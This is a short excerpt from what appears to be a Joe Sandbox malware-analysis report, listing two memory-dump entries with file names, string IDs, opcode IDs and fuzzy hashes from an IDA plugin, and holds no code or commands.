                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (_^q$(_^q$$^q$$^q$$^q
                                            • API String ID: 0-142850551
                                            • Opcode ID: 34a7f52289865ccbbf6fdb539a8c5ddecc43541aef54514551d03e11a7ed5718
                                            • Instruction ID: b9626151258bd1ed869a7dc2a1c9daf0bab060f4fdbf1dc2de2e2db69c83bdca
                                            • Opcode Fuzzy Hash: 34a7f52289865ccbbf6fdb539a8c5ddecc43541aef54514551d03e11a7ed5718
                                            • Instruction Fuzzy Hash: B7C155719406089FDB05EFB8D950A9DBBB2FF89304F108869E0156F3A9DB35AE45CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (_^q$(_^q$$^q$$^q$$^q
                                            • API String ID: 0-142850551
                                            • Opcode ID: 724016d1aa70f2fd4784a9a0a88d6e405cb74df265a22bf236fd537a7753d63a
                                            • Instruction ID: 5108ce2737e86f127d6145c94947d3efb9b51fdcb4a4e5f99ed3e883ec4928d8
                                            • Opcode Fuzzy Hash: 724016d1aa70f2fd4784a9a0a88d6e405cb74df265a22bf236fd537a7753d63a
                                            • Instruction Fuzzy Hash: AFC156719406089FDB05EFB8D940A9EBBB6FF89304F108869E0156F3A9DB35AE45CF50